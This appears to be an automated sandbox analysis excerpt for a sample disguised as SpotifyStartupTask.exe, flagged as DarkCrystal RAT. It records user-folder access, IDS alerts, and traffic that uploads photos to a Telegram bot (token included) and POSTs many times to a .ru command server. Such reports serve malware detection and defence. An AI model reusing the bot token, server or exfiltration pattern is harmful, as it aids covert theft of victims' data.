                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49699 -> 104.21.33.71:80
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49695 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49711 -> 149.154.167.220:443
                              Uses the Telegram API (likely for C&C communication)
                              Source: unknownDNS query: name: api.telegram.org
                              Source: global trafficTCP traffic: 192.168.2.6:65107 -> 162.159.36.2:53
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f6bf5325-8482-421f-8ece-01a42d055ef4"Host: api.telegram.orgContent-Length: 82070Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e71f89a2-fcb0-4187-b628-838104fb7f43"Host: api.telegram.orgContent-Length: 96406Expect: 100-continueConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: ipinfo.io
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49709 -> 34.117.59.81:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49694 -> 34.117.59.81:443
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 153784Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
